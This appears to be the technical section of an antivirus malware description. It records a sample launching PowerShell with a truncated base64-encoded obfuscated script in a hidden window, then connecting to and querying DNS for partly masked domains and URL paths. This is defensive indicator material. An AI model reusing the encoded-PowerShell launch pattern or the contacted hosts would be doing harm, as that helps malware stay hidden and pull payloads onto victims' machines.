Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAEQARwBBAEEAQQBEAEEAPQAnAFIAQwB3AFUAXwBBAEMARABfAFgAJwA7ACQARQA0AEEAQQB4AEQAMQBCAEEAbwBDAEEAQQAgAD...
- 'so###port.com':80
- 'so###port.com':443
- 'mw###nic.com':80
- 'mw###nic.com':443
- http://so###port.com/sitemap/4is36803/
- http://mw###nic.com/cgi-bin/p23602/
- 'so###port.com':443
- 'mw###nic.com':443
- DNS ASK gp###diri.com
- DNS ASK am####gbdshop.com
- DNS ASK so###port.com
- DNS ASK mw###nic.com
- DNS ASK te####calakshay.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABZAEQARwBBAEEAQQBEAEEAPQAnAFIAQwB3AFUAXwBBAEMARABfAFgAJwA7ACQARQA0AEEAQQB4AEQAMQBCAEEAbwBDAEEAQQAgAD... (со скрытым окном)